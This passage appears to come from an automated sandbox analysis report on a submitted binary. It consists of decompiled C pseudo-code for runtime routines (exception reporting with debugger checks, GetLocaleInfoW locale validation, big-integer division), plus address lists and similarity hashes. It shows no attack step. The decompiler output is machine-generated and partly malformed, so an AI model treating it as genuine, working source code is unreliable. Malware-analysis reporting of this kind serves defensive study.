                                                0x001b68b3
                                                0x001b68b3
                                                0x001b68b9
                                                0x001b68c6
                                                0x001b68c6
                                                0x001b68c9
                                                0x001b68cd
                                                0x001b68ce
                                                0x001b68d0
                                                0x001b68d2
                                                0x001b692e
                                                0x001b6930
                                                0x001b6931
                                                0x001b6931
                                                0x001b6933
                                                0x001b6956
                                                0x001b6956
                                                0x001b6956
                                                0x001b6958
                                                0x001b695a
                                                0x001b695d
                                                0x001b695d
                                                0x001b695d
                                                0x001b695f
                                                0x00000000
                                                0x001b695f
                                                0x001b6935
                                                0x001b693c
                                                0x001b693c
                                                0x001b693d
                                                0x001b693e
                                                0x001b6940
                                                0x001b6941
                                                0x001b6942
                                                0x001b694b
                                                0x001b694e
                                                0x001b6951
                                                0x001b6953
                                                0x001b6954
                                                0x001b6954
                                                0x00000000
                                                0x001b6954
                                                0x001b6937
                                                0x001b693a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b693a
                                                0x001b68d9
                                                0x001b68df
                                                0x001b68df
                                                0x001b68e0
                                                0x001b68e1
                                                0x001b68e2
                                                0x001b68e3
                                                0x001b68e4
                                                0x001b68e9
                                                0x001b68ed
                                                0x001b68f2
                                                0x001b68f5
                                                0x001b68f7
                                                0x001b68fa
                                                0x001b68fc
                                                0x001b68fe
                                                0x001b690b
                                                0x001b690b
                                                0x001b690c
                                                0x001b690d
                                                0x001b690f
                                                0x001b6910
                                                0x001b6911
                                                0x001b6916
                                                0x001b691c
                                                0x001b691f
                                                0x001b6921
                                                0x001b6924
                                                0x001b6926
                                                0x001b6927
                                                0x001b692a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b692c
                                                0x001b6900
                                                0x001b6900
                                                0x001b6902
                                                0x00000000
                                                0x00000000
                                                0x001b6904
                                                0x00000000
                                                0x00000000
                                                0x001b6906
                                                0x001b6909
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b6909
                                                0x001b68db
                                                0x001b68dd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b68dd
                                                0x001b68b5
                                                0x001b68b7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b68b7
                                                0x001b68b1
                                                0x00000000
                                                0x001b6792
                                                0x001b678e
                                                0x001b672e
                                                0x001b673a
                                                0x001b673a
                                                0x001b673c
                                                0x001b6743
                                                0x00000000
                                                0x001b6743
                                                0x001b673e
                                                0x00000000
                                                0x001b673e
                                                0x001b66f1
                                                0x001b66f7
                                                0x001b66f7
                                                0x001b66fa
                                                0x001b66fa
                                                0x001b66fb
                                                0x00000000
                                                0x001b66fb
                                                0x001b66f3
                                                0x001b66f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b66f5
                                                0x001b66ae
                                                0x001b66b6
                                                0x001b66b8
                                                0x001b66c5
                                                0x001b66cc
                                                0x001b66ce
                                                0x001b66e0
                                                0x001b66e2
                                                0x001b66e2
                                                0x00000000
                                                0x001b66ce
                                                0x001b66ba
                                                0x00000000
                                                0x001b66ba
                                                0x001b665a
                                                0x001b665f
                                                0x001b6666
                                                0x001b666a
                                                0x001b666d
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: eae636f9b5d76f85db2849b597a99c0f91ff14ec0b87707b7aed0c9803531ab0
                                                • Instruction ID: 8adf3feefd2d33567c54c3d5e3cd875813d604b00694c86d50481dd281973756
                                                • Opcode Fuzzy Hash: eae636f9b5d76f85db2849b597a99c0f91ff14ec0b87707b7aed0c9803531ab0
                                                • Instruction Fuzzy Hash: 71B14772D003459FDB158F68C891BFEBBA5EF79314F15816AE805AB242D739DD01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E001AA085(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                				char _v0;
                                                				struct _EXCEPTION_POINTERS _v12;
                                                				intOrPtr _v80;
                                                				intOrPtr _v88;
                                                				char _v92;
                                                				intOrPtr _v608;
                                                				intOrPtr _v612;
                                                				void* _v616;
                                                				intOrPtr _v620;
                                                				char _v624;
                                                				intOrPtr _v628;
                                                				intOrPtr _v632;
                                                				intOrPtr _v636;
                                                				intOrPtr _v640;
                                                				intOrPtr _v644;
                                                				intOrPtr _v648;
                                                				intOrPtr _v652;
                                                				intOrPtr _v656;
                                                				intOrPtr _v660;
                                                				intOrPtr _v664;
                                                				intOrPtr _v668;
                                                				char _v808;
                                                				char* _t39;
                                                				long _t49;
                                                				intOrPtr _t51;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t57;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				intOrPtr* _t60;
                                                
                                                				_t59 = __esi;
                                                				_t58 = __edi;
                                                				_t57 = __edx;
                                                				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                					_t55 = _a4;
                                                					asm("int 0x29");
                                                				}
                                                				E001AA249(_t34);
                                                				 *_t60 = 0x2cc;
                                                				_v632 = E001AAF60(_t58,  &_v808, 0, 3);
                                                				_v636 = _t55;
                                                				_v640 = _t57;
                                                				_v644 = _t51;
                                                				_v648 = _t59;
                                                				_v652 = _t58;
                                                				_v608 = ss;
                                                				_v620 = cs;
                                                				_v656 = ds;
                                                				_v660 = es;
                                                				_v664 = fs;
                                                				_v668 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t15);
                                                				_v624 = _v0;
                                                				_t39 =  &_v0;
                                                				_v612 = _t39;
                                                				_v808 = 0x10001;
                                                				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                				E001AAF60(_t58,  &_v92, 0, 0x50);
                                                				_v92 = 0x40000015;
                                                				_v88 = 1;
                                                				_v80 = _v0;
                                                				_t28 = IsDebuggerPresent() - 1; // -1
                                                				_v12.ExceptionRecord =  &_v92;
                                                				asm("sbb bl, bl");
                                                				_v12.ContextRecord =  &_v808;
                                                				_t54 =  ~_t28 + 1;
                                                				SetUnhandledExceptionFilter(0);
                                                				_t49 = UnhandledExceptionFilter( &_v12);
                                                				if(_t49 == 0 && _t54 == 0) {
                                                					_push(3);
                                                					return E001AA249(_t49);
                                                				}
                                                				return _t49;
                                                			}


































                                                0x001aa085
                                                0x001aa085
                                                0x001aa085
                                                0x001aa099
                                                0x001aa09b
                                                0x001aa09e
                                                0x001aa09e
                                                0x001aa0a2
                                                0x001aa0a7
                                                0x001aa0bf
                                                0x001aa0c5
                                                0x001aa0cb
                                                0x001aa0d1
                                                0x001aa0d7
                                                0x001aa0dd
                                                0x001aa0e3
                                                0x001aa0ea
                                                0x001aa0f1
                                                0x001aa0f8
                                                0x001aa0ff
                                                0x001aa106
                                                0x001aa10d
                                                0x001aa10e
                                                0x001aa117
                                                0x001aa11d
                                                0x001aa120
                                                0x001aa126
                                                0x001aa135
                                                0x001aa141
                                                0x001aa14c
                                                0x001aa153
                                                0x001aa15a
                                                0x001aa165
                                                0x001aa16d
                                                0x001aa176
                                                0x001aa178
                                                0x001aa17b
                                                0x001aa17d
                                                0x001aa187
                                                0x001aa18f
                                                0x001aa195
                                                0x00000000
                                                0x001aa19c
                                                0x001aa19f

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001AA091
                                                • IsDebuggerPresent.KERNEL32 ref: 001AA15D
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001AA17D
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 001AA187
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 36a49876d4ffbbdcada507d8022d37883d41e8c712615ef72e0fe210006381ba
                                                • Instruction ID: b9dde61b64e1de876d6a349057b953002e454c02b3f856524e17452daed4c012
                                                • Opcode Fuzzy Hash: 36a49876d4ffbbdcada507d8022d37883d41e8c712615ef72e0fe210006381ba
                                                • Instruction Fuzzy Hash: E7314979D0521CDBDB10DFA0D989BCDBBB8AF09300F5040AAE40DAB290EB719A84CF05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E001C1367(void* __ecx, signed char __edx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				short _v248;
                                                				signed int _v252;
                                                				intOrPtr _v256;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t50;
                                                				int _t56;
                                                				signed int _t58;
                                                				void* _t74;
                                                				intOrPtr _t80;
                                                				void* _t89;
                                                				void* _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				signed int _t111;
                                                				signed int _t115;
                                                				intOrPtr* _t117;
                                                				intOrPtr* _t122;
                                                				signed int* _t124;
                                                				int _t126;
                                                				signed int _t127;
                                                				void* _t128;
                                                				void* _t140;
                                                
                                                				_t121 = __edx;
                                                				_t50 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t50 ^ _t127;
                                                				_t125 = _a4;
                                                				_t94 = E001B782A(__ecx, __edx, _a4);
                                                				_t124 =  *(E001B782A(__ecx, __edx, _a4) + 0x34c);
                                                				_t126 = E001C168F(_t125);
                                                				asm("sbb ecx, ecx");
                                                				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
                                                				_v252 = _v252 & 0x00000000;
                                                				if(_t56 == 0) {
                                                					L37:
                                                					 *_t124 = 0;
                                                					_t58 = 1;
                                                					L38:
                                                					return E001A9545(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
                                                				}
                                                				if(E001BDE74(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
                                                					L16:
                                                					if(( *_t124 & 0x00000300) == 0x300) {
                                                						L36:
                                                						_t58 =  !( *_t124 >> 2) & 0x00000001;
                                                						goto L38;
                                                					}
                                                					asm("sbb eax, eax");
                                                					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                						goto L37;
                                                					}
                                                					_t74 = E001BDE74(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                					if(_t74 != 0) {
                                                						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E001BDE74(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
                                                							_push(_t124);
                                                							_t94 = 0;
                                                							if(E001C17E9(_t126, 0) == 0) {
                                                								goto L36;
                                                							}
                                                							 *_t124 =  *_t124 | 0x00000100;
                                                							L34:
                                                							if(_t140 == 0) {
                                                								_t124[1] = _t126;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                					_t111 =  *_t124 | 0x00000200;
                                                					 *_t124 = _t111;
                                                					if( *(_t94 + 0x60) == _t74) {
                                                						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
                                                							goto L20;
                                                						}
                                                						_t122 =  *((intOrPtr*)(_t94 + 0x50));
                                                						_v256 = _t122 + 2;
                                                						do {
                                                							_t80 =  *_t122;
                                                							_t122 = _t122 + 2;
                                                						} while (_t80 != _v252);
                                                						_t121 = _t122 - _v256 >> 1;
                                                						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
                                                							_t74 = 0;
                                                							goto L20;
                                                						}
                                                						_push(_t124);
                                                						if(E001C17E9(_t126, 1) == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t124 =  *_t124 | 0x00000100;
                                                						_t74 = 0;
                                                						L21:
                                                						_t140 = _t124[1] - _t74;
                                                						goto L34;
                                                					}
                                                					L20:
                                                					 *_t124 = _t111 | 0x00000100;
                                                					goto L21;
                                                				}
                                                				asm("sbb eax, eax");
                                                				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                					goto L37;
                                                				}
                                                				_t89 = E001BDE74(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                				_t115 =  *_t124;
                                                				if(_t89 != 0) {
                                                					if((_t115 & 0x00000002) != 0) {
                                                						goto L16;
                                                					}
                                                					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
                                                						L12:
                                                						_t121 =  *_t124;
                                                						if((_t121 & 0x00000001) != 0 || E001C17C4(_t126) == 0) {
                                                							goto L16;
                                                						} else {
                                                							 *_t124 = _t121;
                                                							goto L15;
                                                						}
                                                					}
                                                					_t92 = E001C4FE0(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
                                                					_t128 = _t128 + 0xc;
                                                					if(_t92 != 0) {
                                                						goto L12;
                                                					}
                                                					 *_t124 =  *_t124 | 0x00000002;
                                                					_t124[2] = _t126;
                                                					_t117 =  *((intOrPtr*)(_t94 + 0x50));
                                                					_t121 = _t117 + 2;
                                                					do {
                                                						_t93 =  *_t117;
                                                						_t117 = _t117 + 2;
                                                					} while (_t93 != _v252);
                                                					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
                                                						_t124[1] = _t126;
                                                					}
                                                				} else {
                                                					_t124[1] = _t126;
                                                					 *_t124 = _t115 | 0x00000304;
                                                					L15:
                                                					_t124[2] = _t126;
                                                				}
                                                			}




























                                                0x001c1367
                                                0x001c1372
                                                0x001c1379
                                                0x001c137e
                                                0x001c1387
                                                0x001c138f
                                                0x001c139e
                                                0x001c13aa
                                                0x001c13bb
                                                0x001c13c1
                                                0x001c13ca
                                                0x001c15a4
                                                0x001c15a6
                                                0x001c15a8
                                                0x001c15a9
                                                0x001c15b7
                                                0x001c15b7
                                                0x001c13e3
                                                0x001c149e
                                                0x001c14a9
                                                0x001c1598
                                                0x001c159f
                                                0x00000000
                                                0x001c159f
                                                0x001c14bd
                                                0x001c14d3
                                                0x00000000
                                                0x00000000
                                                0x001c14e3
                                                0x001c14ec
                                                0x001c155d
                                                0x001c1579
                                                0x001c157a
                                                0x001c1588
                                                0x00000000
                                                0x00000000
                                                0x001c158a
                                                0x001c1593
                                                0x001c1593
                                                0x001c1595
                                                0x001c1595
                                                0x001c1593
                                                0x00000000
                                                0x001c155d
                                                0x001c14f0
                                                0x001c14f6
                                                0x001c14fb
                                                0x001c1510
                                                0x00000000
                                                0x00000000
                                                0x001c1512
                                                0x001c1518
                                                0x001c151e
                                                0x001c151e
                                                0x001c1521
                                                0x001c1524
                                                0x001c1533
                                                0x001c1538
                                                0x001c1554
                                                0x00000000
                                                0x001c1554
                                                0x001c153a
                                                0x001c1548
                                                0x00000000
                                                0x00000000
                                                0x001c154a
                                                0x001c1550
                                                0x001c1505
                                                0x001c1505
                                                0x00000000
                                                0x001c1505
                                                0x001c14fd
                                                0x001c1503
                                                0x00000000
                                                0x001c1503
                                                0x001c13f7
                                                0x001c140d
                                                0x00000000
                                                0x00000000
                                                0x001c141d
                                                0x001c1424
                                                0x001c1428
                                                0x001c143a
                                                0x00000000
                                                0x00000000
                                                0x001c1440
                                                0x001c1484
                                                0x001c1484
                                                0x001c1489
                                                0x00000000
                                                0x001c1496
                                                0x001c1499
                                                0x00000000
                                                0x001c1499
                                                0x001c1489
                                                0x001c144f
                                                0x001c1454
                                                0x001c1459
                                                0x00000000
                                                0x00000000
                                                0x001c145b
                                                0x001c145e
                                                0x001c1461
                                                0x001c1464
                                                0x001c1467
                                                0x001c1467
                                                0x001c146a
                                                0x001c146d
                                                0x001c147d
                                                0x001c147f
                                                0x001c147f
                                                0x001c142a
                                                0x001c1430
                                                0x001c1433
                                                0x001c149b
                                                0x001c149b
                                                0x001c149b

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C13BB
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C1405
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C14CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast
                                                • String ID:
                                                • API String ID: 661929714-0
                                                • Opcode ID: fc01f885c55116a7db579ab39b7c298171c6fc088e94f3b2c0b67ed030a1e0f7
                                                • Instruction ID: 6e4a3f9fc5b32cd2326b2272d5562c232553ddc254384ba264056f2c706bac80
                                                • Opcode Fuzzy Hash: fc01f885c55116a7db579ab39b7c298171c6fc088e94f3b2c0b67ed030a1e0f7
                                                • Instruction Fuzzy Hash: 3661B171A80207AFDB289F28CC82FBA77A9EF66300F14417DE906C6586F734D995CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E001AFC47(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v0;
                                                				signed int _v8;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				void* _v532;
                                                				intOrPtr _v536;
                                                				char _v540;
                                                				intOrPtr _v544;
                                                				intOrPtr _v548;
                                                				intOrPtr _v552;
                                                				intOrPtr _v556;
                                                				intOrPtr _v560;
                                                				intOrPtr _v564;
                                                				intOrPtr _v568;
                                                				intOrPtr _v572;
                                                				intOrPtr _v576;
                                                				intOrPtr _v580;
                                                				intOrPtr _v584;
                                                				char _v724;
                                                				intOrPtr _v792;
                                                				intOrPtr _v800;
                                                				char _v804;
                                                				struct _EXCEPTION_POINTERS _v812;
                                                				void* __edi;
                                                				signed int _t40;
                                                				char* _t47;
                                                				char* _t49;
                                                				intOrPtr _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				int _t67;
                                                				intOrPtr _t68;
                                                				signed int _t69;
                                                
                                                				_t68 = __esi;
                                                				_t65 = __edx;
                                                				_t60 = __ebx;
                                                				_t40 =  *0x1d5010; // 0x8121a627
                                                				_t41 = _t40 ^ _t69;
                                                				_v8 = _t40 ^ _t69;
                                                				if(_a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E001AA249(_t41);
                                                					_pop(_t61);
                                                				}
                                                				E001AAF60(_t66,  &_v804, 0, 0x50);
                                                				E001AAF60(_t66,  &_v724, 0, 0x2cc);
                                                				_v812.ExceptionRecord =  &_v804;
                                                				_t47 =  &_v724;
                                                				_v812.ContextRecord = _t47;
                                                				_v548 = _t47;
                                                				_v552 = _t61;
                                                				_v556 = _t65;
                                                				_v560 = _t60;
                                                				_v564 = _t68;
                                                				_v568 = _t66;
                                                				_v524 = ss;
                                                				_v536 = cs;
                                                				_v572 = ds;
                                                				_v576 = es;
                                                				_v580 = fs;
                                                				_v584 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t22);
                                                				_v540 = _v0;
                                                				_t49 =  &_v0;
                                                				_v528 = _t49;
                                                				_v724 = 0x10001;
                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                				_v804 = _a8;
                                                				_v800 = _a12;
                                                				_v792 = _v0;
                                                				_t67 = IsDebuggerPresent();
                                                				SetUnhandledExceptionFilter(0);
                                                				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					_t57 = E001AA249(_t57);
                                                				}
                                                				return E001A9545(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                                                			}





































                                                0x001afc47
                                                0x001afc47
                                                0x001afc47
                                                0x001afc52
                                                0x001afc57
                                                0x001afc59
                                                0x001afc61
                                                0x001afc63
                                                0x001afc66
                                                0x001afc6b
                                                0x001afc6b
                                                0x001afc77
                                                0x001afc8a
                                                0x001afc98
                                                0x001afc9e
                                                0x001afca4
                                                0x001afcaa
                                                0x001afcb0
                                                0x001afcb6
                                                0x001afcbc
                                                0x001afcc2
                                                0x001afcc8
                                                0x001afcce
                                                0x001afcd5
                                                0x001afcdc
                                                0x001afce3
                                                0x001afcea
                                                0x001afcf1
                                                0x001afcf8
                                                0x001afcf9
                                                0x001afd02
                                                0x001afd08
                                                0x001afd0b
                                                0x001afd11
                                                0x001afd1e
                                                0x001afd27
                                                0x001afd30
                                                0x001afd39
                                                0x001afd47
                                                0x001afd49
                                                0x001afd5e
                                                0x001afd6a
                                                0x001afd6d
                                                0x001afd72
                                                0x001afd7f

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001AFD3F
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001AFD49
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001AFD56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: dc6d1c75d589eeb1fda852ab713e99b37ac28aa536e37b4a274816d4eae04d22
                                                • Instruction ID: 908a6c41bdeb49f94e1694aa5836c26712dd8b0943b8e0fa01deafc83b60961f
                                                • Opcode Fuzzy Hash: dc6d1c75d589eeb1fda852ab713e99b37ac28aa536e37b4a274816d4eae04d22
                                                • Instruction Fuzzy Hash: 2231D47490122C9BCB61DF64DC89B8DBBB8BF19310F5041EAE41CA7291E7709F858F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E001B26E0(signed int* _a4, intOrPtr* _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				intOrPtr* _v52;
                                                				signed int _v56;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				char _v540;
                                                				signed int _v544;
                                                				signed int* _t179;
                                                				signed int _t181;
                                                				intOrPtr _t182;
                                                				signed int _t185;
                                                				signed int* _t187;
                                                				signed int _t189;
                                                				unsigned int _t190;
                                                				signed int _t191;
                                                				signed int _t192;
                                                				signed int _t201;
                                                				intOrPtr _t207;
                                                				void* _t210;
                                                				signed int _t212;
                                                				signed int _t223;
                                                				void* _t227;
                                                				signed int _t230;
                                                				intOrPtr* _t237;
                                                				signed int _t238;
                                                				signed int* _t239;
                                                				signed int _t241;
                                                				signed int _t243;
                                                				signed int _t244;
                                                				void* _t245;
                                                				intOrPtr* _t246;
                                                				signed int _t247;
                                                				signed int _t252;
                                                				unsigned int _t253;
                                                				signed int _t255;
                                                				signed int _t256;
                                                				signed int _t257;
                                                				signed int _t258;
                                                				signed int _t259;
                                                				intOrPtr _t260;
                                                				void* _t264;
                                                				signed char _t270;
                                                				intOrPtr* _t272;
                                                				signed int _t276;
                                                				signed int* _t277;
                                                				signed int _t284;
                                                				signed int _t285;
                                                				signed int* _t288;
                                                				signed int _t291;
                                                				signed int _t293;
                                                				intOrPtr* _t294;
                                                				signed int _t298;
                                                				signed int _t299;
                                                				intOrPtr* _t300;
                                                				signed int _t305;
                                                				signed int _t310;
                                                				signed int _t311;
                                                				signed int _t312;
                                                				signed int _t314;
                                                				void* _t315;
                                                				signed int _t316;
                                                				signed int* _t323;
                                                				signed int* _t325;
                                                				signed int _t329;
                                                				signed int _t331;
                                                				signed int _t332;
                                                				signed int _t334;
                                                				void* _t335;
                                                				signed int _t340;
                                                				signed int _t345;
                                                				intOrPtr* _t347;
                                                				signed int* _t348;
                                                
                                                				_t179 = _a4;
                                                				_t329 =  *_t179;
                                                				if(_t329 == 0) {
                                                					L76:
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t237 = _a8;
                                                					_t310 =  *_t237;
                                                					_v72 = _t310;
                                                					if(_t310 == 0) {
                                                						goto L76;
                                                					} else {
                                                						_t4 = _t329 - 1; // 0x1cb
                                                						_t252 = _t4;
                                                						_v8 = _t252;
                                                						_t311 = _t310 + 0xffffffff;
                                                						if(_t311 != 0) {
                                                							__eflags = _t311 - _t252;
                                                							if(_t311 > _t252) {
                                                								goto L76;
                                                							} else {
                                                								_t181 = _t252;
                                                								_t284 = _t252 - _t311;
                                                								__eflags = _t252 - _t284;
                                                								if(_t252 < _t284) {
                                                									L19:
                                                									_t284 = _t284 + 1;
                                                									__eflags = _t284;
                                                								} else {
                                                									_t345 =  &(_a4[1]);
                                                									__eflags = _t345;
                                                									_t272 = _t345 + _t252 * 4;
                                                									_t46 = _t237 + 4; // 0x1c351a
                                                									_t347 = _t46 + _t311 * 4;
                                                									while(1) {
                                                										__eflags =  *_t347 -  *_t272;
                                                										if(__eflags != 0) {
                                                											break;
                                                										}
                                                										_t181 = _t181 - 1;
                                                										_t347 = _t347 - 4;
                                                										_t272 = _t272 - 4;
                                                										__eflags = _t181 - _t284;
                                                										if(_t181 >= _t284) {
                                                											continue;
                                                										} else {
                                                											goto L19;
                                                										}
                                                										goto L20;
                                                									}
                                                									if(__eflags < 0) {
                                                										goto L19;
                                                									}
                                                								}
                                                								L20:
                                                								__eflags = _t284;
                                                								if(__eflags == 0) {
                                                									goto L76;
                                                								} else {
                                                									_t182 = _a8;
                                                									_t238 = _v72;
                                                									_t331 =  *(_t182 + _t238 * 4);
                                                									_t54 = _t238 * 4; // 0xfffef1ca
                                                									_t253 =  *(_t182 + _t54 - 4);
                                                									asm("bsr eax, esi");
                                                									_v44 = _t331;
                                                									_v36 = _t253;
                                                									if(__eflags == 0) {
                                                										_t312 = 0x20;
                                                									} else {
                                                										_t312 = 0x1f - _t182;
                                                									}
                                                									_v12 = _t312;
                                                									_v40 = 0x20 - _t312;
                                                									__eflags = _t312;
                                                									if(_t312 != 0) {
                                                										_t270 = _t312;
                                                										_v36 = _v36 << _t270;
                                                										_v44 = _t331 << _t270 | _t253 >> _v40;
                                                										__eflags = _t238 - 2;
                                                										if(_t238 > 2) {
                                                											_t67 = _t238 * 4; // 0xe850ffff
                                                											_t69 =  &_v36;
                                                											 *_t69 = _v36 |  *(_a8 + _t67 - 8) >> _v40;
                                                											__eflags =  *_t69;
                                                										}
                                                									}
                                                									_t332 = 0;
                                                									_v32 = 0;
                                                									_t285 = _t284 + 0xffffffff;
                                                									__eflags = _t285;
                                                									_v80 = _t285;
                                                									if(_t285 >= 0) {
                                                										_t187 = _a4;
                                                										_t256 = _t285 + _t238;
                                                										_v48 = _t256;
                                                										_v52 = _t187 + (_t285 + 1) * 4;
                                                										_t189 = _t187 + _t256 * 4 + 0xfffffffc;
                                                										__eflags = _t189;
                                                										_v28 = _t189;
                                                										do {
                                                											__eflags = _t256 - _v8;
                                                											if(_t256 > _v8) {
                                                												_t257 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t257 =  *(_t189 + 8);
